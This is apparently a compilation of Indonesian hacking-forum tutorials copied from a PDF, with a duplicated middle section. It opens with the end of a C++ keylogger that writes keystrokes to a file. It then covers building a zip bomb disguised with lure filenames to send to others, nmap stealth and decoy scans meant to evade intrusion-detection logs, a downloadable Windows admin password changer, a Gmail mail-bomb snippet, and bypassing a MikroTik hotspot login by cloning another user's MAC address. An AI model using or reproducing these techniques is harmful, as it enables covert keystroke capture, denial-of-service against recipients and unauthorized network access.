if(GetAsyncKeyState(0x57))
{
cout<<"w";
log+="w";
Sleep (200);
};
if(GetAsyncKeyState(0x58))
{
cout<<"x";
log+="x";
Sleep (200);
};
if(GetAsyncKeyState(0x59))
{
cout<<"y";
log+="y";
Sleep (200);
};
Page 9 of 16
};
}
if(GetAsyncKeyState(0x5A))
{
cout<<"z";
log+="z";
Sleep (200);
};
ofstream myfile;
myfile.open ("log.txt");
myfile << log;
myfile.close();
tutorial lengkapnya udah saya upload di
http://rapidshare.com/files/164909968/keygencpp.rar
ZIP Bom Or ZIP Of Dead
A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash or render useless the program or Create a Zip Bomb - Zip of Deathsystem reading it. It is often used by virus writers to disable antivirus software, so that a more traditional virus sent afterwards could get into system undetected. A zip bomb is usually a small file (up to a few hundred kilobytes) for ease of transport and to avoid suspicion. However, when the file is unpacked its contents are more than the system can handle.You can make your own zip bomb to annoy your friends or just out of curiosity (or wilderness) to experiment with it. Make sure you don't detonate it on yourself.
Here is how to make your own Zip of Death -
1. Buat sebuah file teks, nama a.txt (klik kanan -- New -- Text Document)
2. Buka text tersebut dan ketik karakter null (tahan alt kemudian tekan 255 pada numpad keyboard Anda) di dalamnya.
3. Sekarang tekan Ctrl + A kemudian Ctrl + V beberapa kali untuk membuat beberapa salinan karakter null.
4. Sekarang membuat beberapa salinan a.txt dalam direktori yang sama dan nama yang berbeda.
5. Buka command prompt dan masuk ke folder yang berisi a.txt.
Ketik:
copy / b *. txt b.txt
6. Ini akan menulis semua isi pada file a.text dan menyalinnya ke dalam file baru bernama b.txt, sehingga akam mempercepat proses salinan file. Ulangi langkah-langkah di atas dari awal lagi dan lagi untuk membuat file teks berukuran sangat besar.
7. Setelah Anda memiliki beberapa file yang berisi kosong seperti file teks yang berukuran 1GB atau lebih, maka kompres menggunakan Winrar atau WinZip menjadi file zip.
8. Anda akan menemukan bahwa file tersebut akan dikompresi ke ukuran sangat kecil (sekitar 1MB). Hal ini karena konstruksi yang sederhana dari file sebagai file teks yang berisi 1GB null byte.
9. Rename file zip tersebut, sehingga orang tertarik untuk membukanya
(misal : REAL_new_Miyabii_aoi_unsensso red movie.zip)
Pastikan Anda tidak membuka file ini setelahnya.
Kirimkan ke teman-teman Anda (atau musuh anda) dan tentunya file ini akan mengganggu mereka. Menggunakan beberapa kreativitas dan mengubah nama file teks ke dalam beberapa hal seperti Angelina Jolie.jpg dan kompres dan email ke teman Anda
format compress yg laen juga bisa tergantung kreatifitas masing-masing...he2..
Port Scanner menggunakan NMAP
pada kali ini saya akan menjelaskan dasar dan konsep penggunaan nmap (port scanner) untuk mencari tahu port2 berapa sajakah yang terbuka di sisi target. Jikalau ada kesalahan2 penulisan atau ada kesalahan keterangan, harap di koreksi ya.. soalnya saya juga masih dalam masa tahap pembelajaran. bagi teman2 yang sudah mengerti silahkan ditambahkan lagi ya artikelnya, biar bisa lebih dalam lagi pengertian kita dalam penggunaan nmap.
1. Apakah nmap itu?
nmap adalah port scanner yang sangat terkenal dalam dunia hacking. dan banyak sekali digunakan untuk mengaudit suatu system, dimana untuk mengetahui port yang terbuka yang memungkinkan port tersebut dapat di exploitasi oleh sang intruder. selain NMAP msh banyak lagi port scanner di belahan dunia internet, seperti : superscan, THC, BluesPortTool, dll.
2. Penjelasan
nmap di versi terbaru sekarang ini sudah mempunyai fitur yang sangat baik sekali, bahkan bisa dikatakan lengkap dan juga sudah ada yang versi GUI nya. Ini sangat membantu sekali pada saat kita memulai scanning atau mulai "mengintip" port yang terbuka di komputer target. NMAP memiliki banyak dalam hal teknik sanning, seperti: UDP, TCP Connect(), TCP SYN (half open), ftp proxy (bounce attack), ICMP (ping sweep), FIN, ACK sweep, Xmas tree, Null scan, dll lah.. NMAP juga mempunyai kelebihan untuk mengetahui OS apa yang dipakai oleh target.. Mmm.. Keren kan!! yang nggak kalah mantepnya, di versi terbarunya bisa spoof IP dan MAC kita. Begh… Mantep Coy!! ini berguna agar IP dan MAC kita tidak bisa diketahui (anonimitas di jaringan).
Pada prakteknya saya menggunakan nmap di windows, namun di windows ada beberapa fungsi yang tidak dapat dijalankan tetapi dapat dijalankan di Linux . saya juga menggunakan firewall ZA (untuk melihat log yang dilakukan intruder), dan kadang saya matikan firewall tersebut (untuk melihat port yang benar2 terbuka di komputer saya). karena bila kita memakai firewall, ada port2 khusus yang dia block dan di tutup secara logical oleh si firewall.
3. cara penginstall NMAP
bila kita menginginkan nmap berjalan di windows kita harus membutuhkan yang namanya WinPCAP. Download dan installah di komputer anda. dapat di download di link bawah ini:
Code:
http://www.winpcap.org
Download nmap di link bawah ini. pada directory penginstallan, itu terserah anda peletakkannya.. tp klo bisa ya di "C:\nmap" biar mudah aksesnya lewat cmd.
Code:
http://www.insecure.org/nmap/nmap_download.html
Performansi dari nmap bisa anda baca di websitenya. Tp, Ketika saya coba di Linux, nmap lebih cepat prosesnya dari pada di windows. Itu menurut saya seh.. mungkin ada yang kebalikannya.
4. Basic Scanning
Bila ingin melihat help dari nmapnya
C:\nmap>nmap -h
Contoh 1: Anda ingin mengetahui port berapa sajakah yang terbuka dari port 1-65535 dan OS apakah yang dipakai oleh si target.
C:\nmap>nmap -v -sS -p1-65535 -O 192.168.1.2
maksudnya:
-v = verbose
-sS = stealth scan
-p = port yang di scan
-O = OS detection
192.168.1.2 = target
hasilnya:
Starting Nmap 4.11 (
Code:
http://www.insecure.org/nmap
) at 2006-10-07 16:14
Standard Time
Initiating ARP Ping Scan against 192.168.1.2 [1 port] at 16:14
The ARP Ping Scan took 0.08s to scan 1 total hosts.
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is d
Try using –system-dns or specify valid servers with –dns_servers
DNS resolution of 1 IPs took 0.02s.
Initiating SYN Stealth Scan against 192.168.1.2 [65535 ports] at 16:14
Discovered open port 23/tcp on 192.168.1.2
Discovered open port 25/tcp on 192.168.1.2
Discovered open port 80/tcp on 192.168.1.2
Discovered open port 443/tcp on 192.168.1.2
Discovered open port 5900/tcp on 192.168.1.2
Discovered open port 445/tcp on 192.168.1.2
Discovered open port 135/tcp on 192.168.1.2
Discovered open port 139/tcp on 192.168.1.2
Discovered open port 1066/tcp on 192.168.1.2
The SYN Stealth Scan took 23.05s to scan 65535 total ports.
For OSScan assuming port 23 is open, 1 is closed, and neither are firewa
Host 192.168.1.2 appears to be up … good.
Interesting ports on 192.168.1.2:
Not shown: 65526 closed ports
PORT STATE SERVICE
23/tcp open telnet
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1066/tcp open unknown
5900/tcp open vnc
MAC Address: 00:17:31:AC:48:4D (Asustek Computer)
Device type: general purpose
Running: Microsoft Windows 2003/.NET|NT/2K/XP
OS details: Microsoft Windows 2003 Server or XP SP2
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
IPID Sequence Generation: Incremental
Nmap finished: 1 IP address (1 host up) scanned in 24.328 seconds
Raw packets sent: 68100 (2.997MB) | Rcvd: 65551 (3.016MB)
saya sya pikir gk ada salahya saya post disini ;D ;D buat yang uda ahli saya minta bimbingannyah ;D ;D
pada kali ini saya akan menjelaskan dasar dan konsep penggunaan nmap (port scanner) untuk mencari tahu port2 berapa sajakah yang terbuka di sisi target. Jikalau ada kesalahan2 penulisan atau ada kesalahan keterangan, harap di koreksi ya.. soalnya saya juga masih dalam masa tahap pembelajaran. bagi teman2 yang sudah mengerti silahkan ditambahkan lagi ya artikelnya, biar bisa lebih dalam lagi pengertian kita dalam penggunaan nmap.
1. Apakah nmap itu?
nmap adalah port scanner yang sangat terkenal dalam dunia hacking. dan banyak sekali digunakan untuk mengaudit suatu system, dimana untuk mengetahui port yang terbuka yang memungkinkan port tersebut dapat di exploitasi oleh sang intruder. selain NMAP msh banyak lagi port scanner di belahan dunia internet, seperti : superscan, THC, BluesPortTool, dll.
2. Penjelasan
nmap di versi terbaru sekarang ini sudah mempunyai fitur yang sangat baik sekali, bahkan bisa dikatakan lengkap dan juga sudah ada yang versi GUI nya. Ini sangat membantu sekali pada saat kita memulai scanning atau mulai "mengintip" port yang terbuka di komputer target. NMAP memiliki banyak dalam hal teknik sanning, seperti: UDP, TCP Connect(), TCP SYN (half open), ftp proxy (bounce attack), ICMP (ping sweep), FIN, ACK sweep, Xmas tree, Null scan, dll lah.. NMAP juga mempunyai kelebihan untuk mengetahui OS apa yang dipakai oleh target.. Mmm.. Keren kan!! yang nggak kalah mantepnya, di versi terbarunya bisa spoof IP dan MAC kita. Begh… Mantep Coy!! ini berguna agar IP dan MAC kita tidak bisa diketahui (anonimitas di jaringan).
Pada prakteknya saya menggunakan nmap di windows, namun di windows ada beberapa fungsi yang tidak dapat dijalankan tetapi dapat dijalankan di Linux . saya juga menggunakan firewall ZA (untuk melihat log yang dilakukan intruder), dan kadang saya matikan firewall tersebut (untuk melihat port yang benar2 terbuka di komputer saya). karena bila kita memakai firewall, ada port2 khusus yang dia block dan di tutup secara logical oleh si firewall.
3. cara penginstall NMAP
bila kita menginginkan nmap berjalan di windows kita harus membutuhkan yang namanya WinPCAP. Download dan installah di komputer anda. dapat di download di link bawah ini:
Download nmap di link bawah ini. pada directory penginstallan, itu terserah anda peletakkannya.. tp klo bisa ya di "C:\nmap" biar mudah aksesnya lewat cmd.
Performansi dari nmap bisa anda baca di websitenya. Tp, Ketika saya coba di Linux, nmap lebih cepat prosesnya dari pada di windows. Itu menurut saya seh.. mungkin ada yang kebalikannya.
4. Basic Scanning
Bila ingin melihat help dari nmapnya
C:\nmap>nmap -h
Contoh 1: Anda ingin mengetahui port berapa sajakah yang terbuka dari port 1-65535 dan OS apakah yang dipakai oleh si target.
C:\nmap>nmap -v -sS -p1-65535 -O 192.168.1.2
maksudnya:
-v = verbose
-sS = stealth scan
-p = port yang di scan
-O = OS detection
192.168.1.2 = target
hasilnya:
Starting Nmap 4.11
Standard Time
Initiating ARP Ping Scan against 192.168.1.2 [1 port] at 16:14
The ARP Ping Scan took 0.08s to scan 1 total hosts.
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is d
Try using –system-dns or specify valid servers with –dns_servers
DNS resolution of 1 IPs took 0.02s.
Initiating SYN Stealth Scan against 192.168.1.2 [65535 ports] at 16:14
Discovered open port 23/tcp on 192.168.1.2
Discovered open port 25/tcp on 192.168.1.2
Discovered open port 80/tcp on 192.168.1.2
Discovered open port 443/tcp on 192.168.1.2
Discovered open port 5900/tcp on 192.168.1.2
Discovered open port 445/tcp on 192.168.1.2
Discovered open port 135/tcp on 192.168.1.2
Discovered open port 139/tcp on 192.168.1.2
Discovered open port 1066/tcp on 192.168.1.2
The SYN Stealth Scan took 23.05s to scan 65535 total ports.
For OSScan assuming port 23 is open, 1 is closed, and neither are firewa
Host 192.168.1.2 appears to be up … good.
Interesting ports on 192.168.1.2:
Not shown: 65526 closed ports
PORT STATE SERVICE
23/tcp open telnet
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1066/tcp open unknown
5900/tcp open vnc
MAC Address: 00:17:31:AC:48:4D (Asustek Computer)
Device type: general purpose
Running: Microsoft Windows 2003/.NET|NT/2K/XP
OS details: Microsoft Windows 2003 Server or XP SP2
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
IPID Sequence Generation: Incremental
Nmap finished: 1 IP address (1 host up) scanned in 24.328 seconds
Raw packets sent: 68100 (2.997MB) | Rcvd: 65551 (3.016MB)
contoh 2: Yang diatas kan cuman port dan informasi servicenya saja.. sekarang kita akan melihat service dan version dari port2 yang terbuka tersebut. keep your eyes with me!
C:\nmap>nmap -v -sV -p1-65535 -O 192.168.1.2
hasilnya : beberapa output saya edit supaya nggak kebanyakan.
23/tcp open telnet Microsoft Windows XP telnetd
25/tcp open smtp Microsoft ESMTP 6.0.2600.2180
80/tcp open http Microsoft IIS webserver 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft
1066/tcp open msrpc Microsoft Windows RPC
5900/tcp open vnc VNC (protocol 3.3; Locked out)
Nah, sekarang terlihatlah versionnya.
contoh 3:
Pada saat kita melakukan scanning, sebenarnya IP kita tercatat di log firewall atau snort bila anda menggunakan snort. Nah, klo dah ketahuan.. Game Over dech… dah nggak seru lagi dong.. tinggal nungguin di samperin aja ama si target.
Sekarang bgmn caranya kita menjaga anonimitas IP atau nmap footprinting kita pada saat melakukan scanning. Konsepnya kita bisa melakukan Decoy atau pengelabuan suatu source (check me if i wrong). waduh, kyanya bingung neh. kita langsung praktek dech.. disini kita menggunakan IDS. O iya, komputer kita dengan IP 192.168.1.1 dan target 192.168.1.2
C:\nmap>nmap -v -sV -p 22 -O 192.168.1.2
pada saat kita melakukan scanning.. snort mencatat lognya seperti ini :
TCP TTL:46 TOS:0x0 ID:12633 IpLen:20 DgmLen:60
***A**** Seq: 0x18D5EF65 Ack: 0x0 Win: 0xC00 TcpLen: 40
TCP Options (4) => WS: 10 NOP MSS: 265 TS: 1061109567 0
Nah, ketahuan kan IP kita.. "Kata si snort, I got U.." skrg kita menggunakan Decoy, pada alamat Decoy asal2an saja kita masukin alamat IPnya.
C:\nmap>nmap –v –sV –O –D 192.168.2.10 -p 22 192.168.1.2
lognya seperti ini :
[**] SCAN nmap TCP [**]
11/07-12:01:08.582551 192.168.2.10:35522 -> 192.168.1.2:22
TCP TTL:46 TOS:0x0 ID:1902 IpLen:20 DgmLen:60
***A**** Seq: 0x2B740381 Ack: 0x0 Win: 0xC00 TcpLen: 40
TCP Options (4) => WS: 10 NOP MSS: 265 TS: 1061109567 0
selamat mencoba ya...!!!
Hack password admin windows
buat hack windows password uda beredar berapa versi dari reset via live cd lewat cmd.. jdi nih ane cuma coba shre aja bro.. kita ingat lagi cara hack windows lewat administrator yang defaullt nya sering di kosongin nah gimana klo password nya di isi oleh orang bro jah gak bisa dah kita masuk jdi orang tertinggi aksesnya.. .. ywda saya coba share aplikasi ini mungkin bisa bantu sodara2..
bisa di unduh di sini..
Code:
http://www.ziddu.com/download/5601470/ChangePassadministrator.exe.html
jangan lupa seblum nya instal framework nya dulu.. kalo make vista dah gak usah lagi di instal framework nya...
Code:
http://www.microsoft.com/downloads/details.aspx?FamilyID=0856EACB-4362-4B0D-8EDD-AAB15C5E04F5&displaylang=en
.. moga bermanfaat
BElajar Bom2an dengan Gmail Nyok..:D..
ayo2. belajar yak,, nih khusus newbi aja yak..
nih buat nya pake c#...
ane kasih penggalan code nya...
using System.Net.Mail;
void Bom()
{
MailMessage mail = new MailMessage();
SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com");
mail.From = new MailAddress("your_email_address@gmail.com");
mail.To.Add("to_address@mfc.ae");
mail.Subject = "Test Mail";
mail.Body = "This is for testing SMTP mail from GMAIL";
SmtpServer.Port = 587;
SmtpServer.Credentials = new System.Net.NetworkCredential("username", "password");
SmtpServer.EnableSsl = true;
SmtpServer.Send(mail);
MessageBox.Show("mail Send");
}
Selamat Ber Explore ria...
nih hasilnya...
ByPass Mikrotik Login Hotspot
ByPass Mikrotik Login Hotspot..mungkin ini trick jadul buat para master
yang belom tw ok simak ceritanya..xxixixixx.. pada suatu hari kita jalan2 dengan laptop kesayangan kita eh tw2 nya pengen ngenet walah coba2 scan wifi dapet yang bagus... weleh coy pas mo konek eit tw nya suruh login dulu..weleh2.. pelit amat admin nya..he2.. tenang aja bro tuhan selalu memberi jalan kepada umatnya..
oke pertama siapin dulu senjata2 nya..
1. scaning buat host yang idup di jaringan.. terserah mo peke apa disini saya make Netcut
unduh di http://www.indowebster.com/Netcut__7.html
2. penganti mac yang mw ganti mnual silakan tpi saya milih pake tool Mac Addreas Changer 4.5
ato bisa d unduh di http://tmac.technitium.com/tmac/index.html
langkah2nya sbgai berikut :
1. pastikan kita sudah konek ke server
2. buka cmd coba test koneksi ke google
ex:
ping www.google.com
cret....
reply from 192.168.0.1: Destination not bla2.....
nah itu gateway di jaringan lokal kita.. bearti kita dah gabung tuh di jaringan cuman masalah nya ada mbah mikrotik login yang ngalangin...
3. buka netcat scan
crettt...
nah dapet lagi tuh yang lagi konek + mac nya massing... pilih aja tuh yang mana yang menurut kalian menarik...
4. buka Mac Addreas Changer 4.5 nya ubah mac wireles kita yang trhubung dengan hotspotnya...
nnti cret..
5. buka browser kita
cret..
halman kesayangan kita pun telah tampil di google...xixixix selamat mencoba...
jadi inget jaman ludu Wardriving Mode ON.. xixixixi
nih Video nya
http://www.4shared.com/file/192467202/2fc2841c/By_pAss_mikrotik_Budjank.html